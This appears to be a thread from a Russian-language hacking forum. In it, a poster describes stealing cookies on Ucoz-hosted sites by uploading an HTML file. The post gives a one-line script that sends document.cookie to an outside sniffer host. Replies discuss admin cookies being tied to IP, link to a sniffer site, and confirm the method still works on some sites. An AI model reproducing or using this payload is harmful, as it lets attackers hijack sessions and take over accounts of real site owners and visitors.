![]() |
А вот и долгожданный Ucoz
Всем привет! толькочто нашёл уязвимость в Ucoz, пишусь впервый раз))
Тырим куки в Ucoz 1) создаём фйлик html вписываем код который тырит куки Код:
<script>img = new Image(); img.src = "http://sniffer.ru/images/1.gif?"+document.cookie;</script>Смотрим скрин 4) Должно получиться примерно так когда файлик загружен Смотрим скрин 5) Смотрим логи на сниффере (у меня свой сниффер) Смотрим скрин Ну вот и всё... |
На UcoZе куки Админов привязаны к IP.
|
Хотя может я ошибаюсь...
|
Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект.. |
Цитата:
|
Цитата:
|
не новый способ.. подробнее кто хочет _http://hacker-pro.net/sniffer/ там и видео есть вроде
|
еще актуально?
|
еще актуально, но на некоторых сайтах запрещено добавлять html файлы..
|
Куки Админов привязаны к айпи. Хотя должно прокатить всеравно.
|
| Время: 20:41 |